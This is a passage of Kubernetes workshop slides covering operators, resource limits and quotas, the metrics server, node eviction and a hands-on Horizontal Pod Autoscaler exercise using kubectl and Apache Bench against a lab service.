.debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Scaling up the cluster - We can see on Cerebro that the cluster is "yellow" (because our index is not replicated) - Let's change that! .exercise[ - Edit the ElasticSearch cluster manifest: ```bash kubectl edit es demo ``` - Find the field `count: 1` and change it to 3 - Save and quit ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Deploying our apps with operators - It is very simple to deploy with `kubectl create deployment` / `kubectl expose` - We can unlock more features by writing YAML and using `kubectl apply` - Kustomize or Helm let us deploy in multiple environments (and adjust/tweak parameters in each environment) - We can also use an operator to deploy our application .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Pros and cons of deploying with operators - The app definition and configuration is persisted in the Kubernetes API - Multiple instances of the app can be manipulated with `kubectl get` - We can add labels, annotations to the app instances - Our controller can execute custom code for any lifecycle event - However, we need to write this controller - We need to be careful about changes (what happens when the resource `spec` is updated?) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Operators are not magic - Look at the ElasticSearch resource definition (`~/container.training/k8s/eck-elasticsearch.yaml`) - What should happen if we flip the TLS flag? Twice? - What should happen if we add another group of nodes? - What if we want different images or parameters for the different nodes? *Operators can be very powerful.
But we need to know exactly the scenarios that they can handle.* ??? :EN:- Kubernetes operators :EN:- Deploying ElasticSearch with ECK :FR:- Les opérateurs :FR:- Déployer ElasticSearch avec ECK .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/container-cranes.jpg)] --- name: toc-resource-limits class: title Resource Limits .nav[ [Previous section](#toc-operators) | [Back to table of contents](#toc-module-3) | [Next section](#toc-defining-min-max-and-default-resources) ] .debug[(automatically generated title slide)] --- # Resource Limits - We can attach resource indications to our pods (or rather: to the *containers* in our pods) - We can specify *limits* and/or *requests* - We can specify quantities of CPU and/or memory .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## CPU vs memory - CPU is a *compressible resource* (it can be preempted immediately without adverse effect) - Memory is an *incompressible resource* (it needs to be swapped out to be reclaimed; and this is costly) - As a result, exceeding limits will have different consequences for CPU and memory .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Exceeding CPU limits - CPU can be reclaimed instantaneously (in fact, it is preempted hundreds of times per second, at each context switch) - If a container uses too much CPU, it can be throttled (it will be scheduled less often) - The processes in that container will run slower (or rather: they will not run faster) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Exceeding memory limits - Memory needs to be swapped out before being reclaimed - "Swapping" means writing memory pages to disk, which is very slow - On a classic system, a process that swaps can get 1000x slower (because disk I/O is 1000x slower than memory I/O) - Exceeding the memory limit (even by a small amount) can reduce performance *a lot* - Kubernetes *does not support swap* (more on that later!) - Exceeding the memory limit will cause the container to be killed .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Limits vs requests - Limits are "hard limits" (they can't be exceeded) - a container exceeding its memory limit is killed - a container exceeding its CPU limit is throttled - Requests are used for scheduling purposes - a container using *less* than what it requested will never be killed or throttled - the scheduler uses the requested sizes to determine placement - the resources requested by all pods on a node will never exceed the node size .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Pod quality of service Each pod is assigned a QoS class (visible in `status.qosClass`). - If limits = requests: - as long as the container uses less than the limit, it won't be affected - if all containers in a pod have *(limits=requests)*, QoS is considered "Guaranteed" - If requests < limits: - as long as the container uses less than the request, it won't be affected - otherwise, it might be killed/evicted if the node gets overloaded - if at least one container has *(requests<limits)*, QoS is considered "Burstable" - If a pod doesn't have any request nor limit, QoS is considered "BestEffort" .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Quality of service impact - When a node is overloaded, BestEffort pods are killed first - Then, Burstable pods that exceed their limits - Burstable and Guaranteed pods below their limits are never killed (except if their node fails) - If we only use Guaranteed pods, no pod should ever be killed (as long as they stay within their limits) (Pod QoS is also explained in [this page](https://kubernetes.io/docs/tasks/configure-pod-container/quality-service-pod/) of the Kubernetes documentation and in [this blog post](https://medium.com/google-cloud/quality-of-service-class-qos-in-kubernetes-bb76a89eb2c6).) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Where is my swap? - The semantics of memory and swap limits on Linux cgroups are complex - In particular, it's not possible to disable swap for a cgroup (the closest option is to [reduce "swappiness"](https://unix.stackexchange.com/questions/77939/turning-off-swapping-for-only-one-process-with-cgroups)) - The architects of Kubernetes wanted to ensure that Guaranteed pods never swap - The only solution was to disable swap entirely .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Alternative point of view - Swap enables paging¹ of anonymous² memory - Even when swap is disabled, Linux will still page memory for: - executables, libraries - mapped files - Disabling swap *will reduce performance and available resources* - For a good time, read [kubernetes/kubernetes#53533](https://github.com/kubernetes/kubernetes/issues/53533) - Also read this [excellent blog post about swap](https://jvns.ca/blog/2017/02/17/mystery-swap/) ¹Paging: reading/writing memory pages from/to disk to reclaim physical memory ²Anonymous memory: memory that is not backed by files or blocks .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Enabling swap anyway - If you don't care that pods are swapping, you can enable swap - You will need to add the flag `--fail-swap-on=false` to kubelet (otherwise, it won't start!) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Specifying resources - Resource requests are expressed at the *container* level - CPU is expressed in "virtual CPUs" (corresponding to the virtual CPUs offered by some cloud providers) - CPU can be expressed with a decimal value, or even a "milli" suffix (so 100m = 0.1) - Memory is expressed in bytes - Memory can be expressed with k, M, G, T, ki, Mi, Gi, Ti suffixes (corresponding to 10^3, 10^6, 10^9, 10^12, 2^10, 2^20, 2^30, 2^40) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Specifying resources in practice This is what the spec of a Pod with resources will look like: ```yaml containers: - name: httpenv image: jpetazzo/httpenv resources: limits: memory: "100Mi" cpu: "100m" requests: memory: "100Mi" cpu: "10m" ``` This set of resources makes sure that this service won't be killed (as long as it stays below 100 MB of RAM), but allows its CPU usage to be throttled if necessary. .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Default values - If we specify a limit without a request: the request is set to the limit - If we specify a request without a limit: there will be no limit (which means that the limit will be the size of the node) - If we don't specify anything: the request is zero and the limit is the size of the node *Unless there are default values defined for our namespace!* .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## We need default resource values - If we do not set resource values at all: - the limit is "the size of the node" - the request is zero - This is generally *not* what we want - a container without a limit can use up all the resources of a node - if the request is zero, the scheduler can't make a smart placement decision - To address this, we can set default values for resources - This is done with a LimitRange object .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/container-housing.jpg)] --- name: toc-defining-min-max-and-default-resources class: title Defining min, max, and default resources .nav[ [Previous section](#toc-resource-limits) | [Back to table of contents](#toc-module-3) | [Next section](#toc-namespace-quotas) ] .debug[(automatically generated title slide)] --- # Defining min, max, and default resources - We can create LimitRange objects to indicate any combination of: - min and/or max resources allowed per pod - default resource *limits* - default resource *requests* - maximal burst ratio (*limit/request*) - LimitRange objects are namespaced - They apply to their namespace only .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## LimitRange example ```yaml apiVersion: v1 kind: LimitRange metadata: name: my-very-detailed-limitrange spec: limits: - type: Container min: cpu: "100m" max: cpu: "2000m" memory: "1Gi" default: cpu: "500m" memory: "250Mi" defaultRequest: cpu: "500m" ``` .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Example explanation The YAML on the previous slide shows an example LimitRange object specifying very detailed limits on CPU usage, and providing defaults on RAM usage. Note the `type: Container` line: in the future, it might also be possible to specify limits per Pod, but it's not [officially documented yet](https://github.com/kubernetes/website/issues/9585). .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## LimitRange details - LimitRange restrictions are enforced only when a Pod is created (they don't apply retroactively) - They don't prevent creation of e.g. an invalid Deployment or DaemonSet (but the pods will not be created as long as the LimitRange is in effect) - If there are multiple LimitRange restrictions, they all apply together (which means that it's possible to specify conflicting LimitRanges,
preventing any Pod from being created) - If a LimitRange specifies a `max` for a resource but no `default`,
that `max` value becomes the `default` limit too .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/containers-by-the-water.jpg)] --- name: toc-namespace-quotas class: title Namespace quotas .nav[ [Previous section](#toc-defining-min-max-and-default-resources) | [Back to table of contents](#toc-module-3) | [Next section](#toc-limiting-resources-in-practice) ] .debug[(automatically generated title slide)] --- # Namespace quotas - We can also set quotas per namespace - Quotas apply to the total usage in a namespace (e.g. total CPU limits of all pods in a given namespace) - Quotas can apply to resource limits and/or requests (like the CPU and memory limits that we saw earlier) - Quotas can also apply to other resources: - "extended" resources (like GPUs) - storage size - number of objects (number of pods, services...) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Creating a quota for a namespace - Quotas are enforced by creating a ResourceQuota object - ResourceQuota objects are namespaced, and apply to their namespace only - We can have multiple ResourceQuota objects in the same namespace - The most restrictive values are used .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Limiting total CPU/memory usage - The following YAML specifies an upper bound for *limits* and *requests*: ```yaml apiVersion: v1 kind: ResourceQuota metadata: name: a-little-bit-of-compute spec: hard: requests.cpu: "10" requests.memory: 10Gi limits.cpu: "20" limits.memory: 20Gi ``` These quotas will apply to the namespace where the ResourceQuota is created. .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Limiting number of objects - The following YAML specifies how many objects of specific types can be created: ```yaml apiVersion: v1 kind: ResourceQuota metadata: name: quota-for-objects spec: hard: pods: 100 services: 10 secrets: 10 configmaps: 10 persistentvolumeclaims: 20 services.nodeports: 0 services.loadbalancers: 0 count/roles.rbac.authorization.k8s.io: 10 ``` (The `count/` syntax allows limiting arbitrary objects, including CRDs.) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## YAML vs CLI - Quotas can be created with a YAML definition - ...Or with the `kubectl create quota` command - Example: ```bash kubectl create quota my-resource-quota --hard=pods=300,limits.memory=300Gi ``` - With both YAML and CLI form, the values are always under the `hard` section (there is no `soft` quota) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Viewing current usage When a ResourceQuota is created, we can see how much of it is used: ``` kubectl describe resourcequota my-resource-quota Name: my-resource-quota Namespace: default Resource Used Hard -------- ---- ---- pods 12 100 services 1 5 services.loadbalancers 0 0 services.nodeports 0 0 ``` .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Advanced quotas and PriorityClass - Since Kubernetes 1.12, it is possible to create PriorityClass objects - Pods can be assigned a PriorityClass - Quotas can be linked to a PriorityClass - This allows us to reserve resources for pods within a namespace - For more details, check [this documentation page](https://kubernetes.io/docs/concepts/policy/resource-quotas/#resource-quota-per-priorityclass) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/distillery-containers.jpg)] --- name: toc-limiting-resources-in-practice class: title Limiting resources in practice .nav[ [Previous section](#toc-namespace-quotas) | [Back to table of contents](#toc-module-3) | [Next section](#toc-checking-pod-and-node-resource-usage) ] .debug[(automatically generated title slide)] --- # Limiting resources in practice - We have at least three mechanisms: - requests and limits per Pod - LimitRange per namespace - ResourceQuota per namespace - Let's see a simple recommendation to get started with resource limits .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Set a LimitRange - In each namespace, create a LimitRange object - Set a small default CPU request and CPU limit (e.g. "100m") - Set a default memory request and limit depending on your most common workload - for Java, Ruby: start with "1G" - for Go, Python, PHP, Node: start with "250M" - Set upper bounds slightly below your expected node size (80-90% of your node size, with at least a 500M memory buffer) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Set a ResourceQuota - In each namespace, create a ResourceQuota object - Set generous CPU and memory limits (e.g. half the cluster size if the cluster hosts multiple apps) - Set generous objects limits - these limits should not be here to constrain your users - they should catch a runaway process creating many resources - example: a custom controller creating many pods .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Observe, refine, iterate - Observe the resource usage of your pods (we will see how in the next chapter) - Adjust individual pod limits - If you see trends: adjust the LimitRange (rather than adjusting every individual set of pod limits) - Observe the resource usage of your namespaces (with `kubectl describe resourcequota ...`) - Rinse and repeat regularly .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Additional resources - [A Practical Guide to Setting Kubernetes Requests and Limits](http://blog.kubecost.com/blog/requests-and-limits/) - explains what requests and limits are - provides guidelines to set requests and limits - gives PromQL expressions to compute good values
(our app needs to be running for a while) - [Kube Resource Report](https://github.com/hjacobs/kube-resource-report/) - generates web reports on resource usage - [static demo](https://hjacobs.github.io/kube-resource-report/sample-report/output/index.html) | [live demo](https://kube-resource-report.demo.j-serv.de/applications.html) ??? :EN:- Setting compute resource limits :EN:- Defining default policies for resource usage :EN:- Managing cluster allocation and quotas :EN:- Resource management in practice :FR:- Allouer et limiter les ressources des conteneurs :FR:- Définir des ressources par défaut :FR:- Gérer les quotas de ressources au niveau du cluster :FR:- Conseils pratiques .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/lots-of-containers.jpg)] --- name: toc-checking-pod-and-node-resource-usage class: title Checking pod and node resource usage .nav[ [Previous section](#toc-limiting-resources-in-practice) | [Back to table of contents](#toc-module-3) | [Next section](#toc-cluster-sizing) ] .debug[(automatically generated title slide)] --- # Checking pod and node resource usage - Since Kubernetes 1.8, metrics are collected by the [resource metrics pipeline](https://kubernetes.io/docs/tasks/debug-application-cluster/resource-metrics-pipeline/) - The resource metrics pipeline is: - optional (Kubernetes can function without it) - necessary for some features (like the Horizontal Pod Autoscaler) - exposed through the Kubernetes API using the [aggregation layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) - usually implemented by the "metrics server" .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## How to know if the metrics server is running? - The easiest way to know is to run `kubectl top` .exercise[ - Check if the core metrics pipeline is available: ```bash kubectl top nodes ``` ] If it shows our nodes and their CPU and memory load, we're good! .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## Installing metrics server - The metrics server doesn't have any particular requirements (it doesn't need persistence, as it doesn't *store* metrics) - It has its own repository, [kubernetes-incubator/metrics-server](https://github.com/kubernetes-incubator/metrics-server) - The repository comes with [YAML files for deployment](https://github.com/kubernetes-incubator/metrics-server/tree/master/deploy/1.8%2B) - These files may not work on some clusters (e.g. if your node names are not in DNS) - The container.training repository has a [metrics-server.yaml](https://github.com/jpetazzo/container.training/blob/master/k8s/metrics-server.yaml#L90) file to help with that (we can `kubectl apply -f` that file if needed) .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## Showing container resource usage - Once the metrics server is running, we can check container resource usage .exercise[ - Show resource usage across all containers: ```bash kubectl top pods --containers --all-namespaces ``` ] - We can also use selectors (`-l app=...`) .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## Other tools - kube-capacity is a great CLI tool to view resources (https://github.com/robscott/kube-capacity) - It can show resource and limits, and compare them with usage - It can show utilization per node, or per pod - kube-resource-report can generate HTML reports (https://github.com/hjacobs/kube-resource-report) ??? :EN:- The *core metrics pipeline* :FR:- Le *core metrics pipeline* .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/plastic-containers.JPG)] --- name: toc-cluster-sizing class: title Cluster sizing .nav[ [Previous section](#toc-checking-pod-and-node-resource-usage) | [Back to table of contents](#toc-module-3) | [Next section](#toc-the-horizontal-pod-autoscaler) ] .debug[(automatically generated title slide)] --- # Cluster sizing - What happens when the cluster gets full? - How can we scale up the cluster? - Can we do it automatically? - What are other methods to address capacity planning? .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## When are we out of resources? - kubelet monitors node resources: - memory - node disk usage (typically the root filesystem of the node) - image disk usage (where container images and RW layers are stored) - For each resource, we can provide two thresholds: - a hard threshold (if it's met, it provokes immediate action) - a soft threshold (provokes action only after a grace period) - Resource thresholds and grace periods are configurable (by passing kubelet command-line flags) .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## What happens then? - If disk usage is too high: - kubelet will try to remove terminated pods - then, it will try to *evict* pods - If memory usage is too high: - it will try to evict pods - The node is marked as "under pressure" - This temporarily prevents new pods from being scheduled on the node .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Which pods get evicted? - kubelet looks at the pods' QoS and PriorityClass - First, pods with BestEffort QoS are considered - Then, pods with Burstable QoS exceeding their *requests* (but only if the exceeding resource is the one that is low on the node) - Finally, pods with Guaranteed QoS, and Burstable pods within their requests - Within each group, pods are sorted by PriorityClass - If there are pods with the same PriorityClass, they are sorted by usage excess (i.e. the pods whose usage exceeds their requests the most are evicted first) .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- class: extra-details ## Eviction of Guaranteed pods - *Normally*, pods with Guaranteed QoS should not be evicted - A chunk of resources is reserved for node processes (like kubelet) - It is expected that these processes won't use more than this reservation - If they do use more resources anyway, all bets are off! - If this happens, kubelet must evict Guaranteed pods to preserve node stability (or Burstable pods that are still within their requested usage) .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## What happens to evicted pods? - The pod is terminated - It is marked as `Failed` at the API level - If the pod was created by a controller, the controller will recreate it - The pod will be recreated on another node, *if there are resources available!* - For more details about the eviction process, see: - [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction, - [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption. .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## What if there are no resources available? - Sometimes, a pod cannot be scheduled anywhere: - all the nodes are under pressure, - or the pod requests more resources than are available - The pod then remains in `Pending` state until the situation improves .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Cluster scaling - One way to improve the situation is to add new nodes - This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler) - The autoscaler will automatically scale up: - if there are pods that failed to be scheduled - The autoscaler will automatically scale down: - if nodes have a low utilization for an extended period of time .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Restrictions, gotchas ... - The Cluster Autoscaler only supports a few cloud infrastructures (see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list) - The Cluster Autoscaler cannot scale down nodes that have pods using: - local storage - affinity/anti-affinity rules preventing them from being rescheduled - a restrictive PodDisruptionBudget .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Other way to do capacity planning - "Running Kubernetes without nodes" - Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or [Kiyot](https://static.elotl.co/docs/latest/kiyot/kiyot.html) can run pods using on-demand resources - Virtual Kubelet can leverage e.g. ACI or Fargate to run pods - Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod) - Economic advantage (no wasted capacity) - Security advantage (stronger isolation between pods) Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details. ??? :EN:- What happens when the cluster is at, or over, capacity :EN:- Cluster sizing and scaling :FR:- Ce qui se passe quand il n'y a plus assez de ressources :FR:- Dimensionner et redimensionner ses clusters .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-1.jpg)] --- name: toc-the-horizontal-pod-autoscaler class: title The Horizontal Pod Autoscaler .nav[ [Previous section](#toc-cluster-sizing) | [Back to table of contents](#toc-module-3) | [Next section](#toc-collecting-metrics-with-prometheus) ] .debug[(automatically generated title slide)] --- # The Horizontal Pod Autoscaler - What is the Horizontal Pod Autoscaler, or HPA? - It is a controller that can perform *horizontal* scaling automatically - Horizontal scaling = changing the number of replicas (adding/removing pods) - Vertical scaling = changing the size of individual replicas (increasing/reducing CPU and RAM per pod) - Cluster scaling = changing the size of the cluster (adding/removing nodes) .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Principle of operation - Each HPA resource (or "policy") specifies: - which object to monitor and scale (e.g. a Deployment, ReplicaSet...) - min/max scaling ranges (the max is a safety limit!) - a target resource usage (e.g. the default is CPU=80%) - The HPA continuously monitors the CPU usage for the related object - It computes how many pods should be running: `TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)` - It scales the related object up/down to this target number of pods .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Pre-requirements - The metrics server needs to be running (i.e. we need to be able to see pod metrics with `kubectl top pods`) - The pods that we want to autoscale need to have resource requests (because the target CPU% is not absolute, but relative to the request) - The latter actually makes a lot of sense: - if a Pod doesn't have a CPU request, it might be using 10% of CPU... - ...but only because there is no CPU time available! - this makes sure that we won't add pods to nodes that are already resource-starved .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Testing the HPA - We will start a CPU-intensive web service - We will send some traffic to that service - We will create an HPA policy - The HPA will automatically scale up the service for us .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## A CPU-intensive web service - Let's use `jpetazzo/busyhttp` (it is a web server that will use 1s of CPU for each HTTP request) .exercise[ - Deploy the web server: ```bash kubectl create deployment busyhttp --image=jpetazzo/busyhttp ``` - Expose it with a ClusterIP service: ```bash kubectl expose deployment busyhttp --port=80 ``` - Get the ClusterIP allocated to the service: ```bash kubectl get svc busyhttp ``` ] .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Monitor what's going on - Let's start a bunch of commands to watch what is happening .exercise[ - Monitor pod CPU usage: ```bash watch kubectl top pods -l app=busyhttp ``` - Monitor service latency: ```bash httping http://`$CLUSTERIP`/ ``` - Monitor cluster events: ```bash kubectl get events -w ``` ] .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Send traffic to the service - We will use `ab` (Apache Bench) to send traffic .exercise[ - Send a lot of requests to the service, with a concurrency level of 3: ```bash ab -c 3 -n 100000 http://`$CLUSTERIP`/ ``` ] The latency (reported by `httping`) should increase above 3s. The CPU utilization should increase to 100%. (The server is single-threaded and won't go above 100%.) .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Create an HPA policy - There is a helper command to do that for us: `kubectl autoscale` .exercise[ - Create the HPA policy for the `busyhttp` deployment: ```bash kubectl autoscale deployment busyhttp --max=10 ``` ] By default, it will assume a target of 80% CPU usage. This can also be set with `--cpu-percent=`. -- *The autoscaler doesn't seem to work. Why?* .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## What did we miss? - The events stream gives us a hint, but to be honest, it's not very clear: `missing request for cpu` - We forgot to specify a resource request for our Deployment! - The HPA target is not an absolute CPU% - It is relative to the CPU requested by the pod .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Adding a CPU request - Let's edit the deployment and add a CPU request - Since our server can use up to 1 core, let's request 1 core .exercise[ - Edit the Deployment definition: ```bash kubectl edit deployment busyhttp ``` - In the `containers` list, add the following block: ```yaml resources: requests: cpu: "1" ``` ] .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Results - After saving and quitting, a rolling update happens (if `ab` or `httping` exits, make sure to restart it) - It will take a minute or two for the HPA to kick in: - the HPA runs every 30 seconds by default - it needs to gather metrics from the metrics server first - If we scale further up (or down), the HPA will react after a few minutes: - it won't scale up if it already scaled in the last 3 minutes - it won't scale down if it already scaled in the last 5 minutes .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## What about other metrics? - The HPA in API group `autoscaling/v1` only supports CPU scaling - The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups: - metrics.k8s.io, aka metrics server (per-Pod CPU and RAM) - custom.metrics.k8s.io, custom metrics per Pod - external.metrics.k8s.io, external metrics (not associated to Pods) - Kubernetes doesn't implement any of these API groups - Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis) - The metrics provided by metrics server are standard; everything else is custom - For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8) .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Cleanup - Since `busyhttp` uses CPU cycles, let's stop it before moving on .exercise[ - Delete the `busyhttp` Deployment: ```bash kubectl delete deployment busyhttp ``` ] ??? :EN:- Auto-scaling resources :FR:- *Auto-scaling* (dimensionnement automatique) des ressources .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-2.jpg)] --- name: toc-collecting-metrics-with-prometheus class: title Collecting metrics with Prometheus .nav[ [Previous section](#toc-the-horizontal-pod-autoscaler) | [Back to table of contents](#toc-module-3) | [Next section](#toc-stateful-sets) ] .debug[(automatically generated title slide)] --- # Collecting metrics with Prometheus - Prometheus is an open-source monitoring system including: - multiple *service discovery* backends to figure out which metrics to collect - a *scraper* to collect these metrics - an efficient *time series 